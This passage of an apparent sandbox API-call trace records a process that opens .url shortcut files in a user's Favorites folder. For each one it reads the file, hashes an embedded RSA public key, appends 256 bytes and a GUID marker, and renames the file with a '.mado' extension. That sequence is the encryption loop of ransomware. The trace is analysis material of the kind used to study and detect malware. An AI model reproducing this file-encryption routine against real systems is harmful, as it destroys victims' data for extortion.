ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0205.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b3348 [0205.390] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned=".url" [0205.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.390] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.391] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.393] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.393] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.394] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.394] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.394] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.395] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.395] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.395] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.395] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.395] GetLastError () returned 0x0 [0205.395] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.395] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.395] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.395] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.395] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.395] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.395] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.395] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.395] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.396] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.396] CloseHandle (hObject=0x63c) returned 1 [0205.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.396] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.mado")) returned 1 [0205.398] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0205.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b3348 [0205.398] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned=".url" [0205.398] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.398] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.398] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.400] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.400] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.401] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.401] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.401] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.401] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.401] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.402] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.402] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.402] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.402] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.402] GetLastError () returned 0x0 [0205.402] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.402] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.402] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.402] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.402] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.402] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.403] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.403] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.403] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.403] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.403] CloseHandle (hObject=0x63c) returned 1 [0205.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0205.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74e80 [0205.404] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.mado")) returned 1 [0205.405] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0205.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b3348 [0205.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned=".url" [0205.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.406] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.406] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.408] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.409] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.409] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.409] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.410] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.410] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.410] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.410] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.410] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.410] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.411] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.411] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.411] GetLastError () returned 0x0 [0205.411] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.411] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.411] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.411] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.411] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.411] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b661e0 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe7f0 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66228 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe808 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe838 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe880 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe850 [0205.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0205.412] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe838 | out: hHeap=0x2c0000) returned 1 [0205.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe850 | out: hHeap=0x2c0000) returned 1 [0205.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe880 | out: hHeap=0x2c0000) returned 1 [0205.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe880 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe850 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe838 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.412] RtlAllocateHeap (HeapHandle=0x2c0000, 